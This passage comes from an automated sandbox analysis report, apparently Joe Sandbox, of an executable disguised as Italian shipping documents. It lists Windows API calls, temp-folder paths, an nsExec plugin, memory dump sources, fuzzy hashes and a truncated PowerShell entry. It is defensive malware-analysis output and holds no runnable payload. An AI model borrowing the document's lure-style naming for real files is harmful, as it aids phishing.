                                        • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                        • wsprintfW.USER32 ref: 00404E2D
                                        • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                        • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                        • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                        • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                        APIs
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                          • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405EDF
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405F87
                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp
                                        • API String ID: 3248276644-71882954
                                        • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                        • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                        • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                        • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                        APIs
                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405EDF
                                        • CharNextW.USER32(00000000), ref: 00405EE4
                                        • CharNextW.USER32(00000000), ref: 00405EFC
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp, xrefs: 00405ED2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp
                                        • API String ID: 3213498283-1031832637
                                        • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                        • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                        • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                        • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                        • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                        • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                        APIs
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 0040269A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp$C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll
                                        • API String ID: 1659193697-282007718
                                        • Opcode ID: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                        • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                        • Opcode Fuzzy Hash: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                        • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                        • GetTickCount.KERNEL32 ref: 0040304F
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                        • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                        • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                        • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                        • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0040557F
                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                          • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                        • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                        • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                        • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                        APIs
                                        • CharNextExA.USER32(?,0000000A,00000000,73A930B8,?,73A916EA,?,00000002,00000002,0000000A), ref: 73A91974
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true
                                        • Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: $
                                        • API String ID: 3213498283-227171996
                                        • Opcode ID: 19597e2d98042e172a30e88cd35723c25ae878a34e1eab4bbc97b591b59e77a8
                                        • Instruction ID: e93dc1661d59a8f2f306953df97a1189c37fba16b36142a323147b768855c767
                                        • Opcode Fuzzy Hash: 19597e2d98042e172a30e88cd35723c25ae878a34e1eab4bbc97b591b59e77a8
                                        • Instruction Fuzzy Hash: 87F08C310083CE9ADF02CF14C819BEA7FA9AF05204F180088FD859B282C771EA29C7A5
                                        APIs
                                        • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                        • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3081826266
                                        • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                        • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                        • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                        • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                        APIs
                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 00405E78
                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 00405E88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                        • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                        • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                        APIs
                                        • lstrlenW.KERNEL32(?,74DEF360,00000000,00000000,?,?,73A91295,00000000,/TIMEOUT=,00000000), ref: 73A91A71
                                        • lstrlenW.KERNEL32(?,?,?,73A91295,00000000,/TIMEOUT=,00000000), ref: 73A91A7C
                                        • lstrcmpiW.KERNEL32(?,?,?,?,73A91295,00000000,/TIMEOUT=,00000000), ref: 73A91A9A
                                        • lstrlenW.KERNEL32(00000000,?,?,73A91295,00000000,/TIMEOUT=,00000000), ref: 73A91AB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true
                                        • Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: lstrlen$lstrcmpi
                                        • String ID:
                                        • API String ID: 1808961391-0
                                        • Opcode ID: 83ba60766247e4a9449ccf68cc8a1280aa01dad58b7693ab21124f4bf95a33e7
                                        • Instruction ID: 4215216eecfac677316e96c28bdad94228ad9b41f5a9aa6479b826c0b11d529a
                                        • Opcode Fuzzy Hash: 83ba60766247e4a9449ccf68cc8a1280aa01dad58b7693ab21124f4bf95a33e7
                                        • Instruction Fuzzy Hash: C4018136200118BFEB029FA5DD81E9D77E8EF45350726407AF904EB224D770DE41DBA8
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                        • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                        • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                        • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                        • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_c10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \V#k
                                        • API String ID: 0-2892493493
                                        • Opcode ID: 3270f1c5dc435147fd6d86371afeeff843b19f6fcb4659c93dfa481df91a0668
                                        • Instruction ID: dc64a57cf12ccbf023fb00162a22c336518a4d703f5ecb27cdc5f59c56afdb21
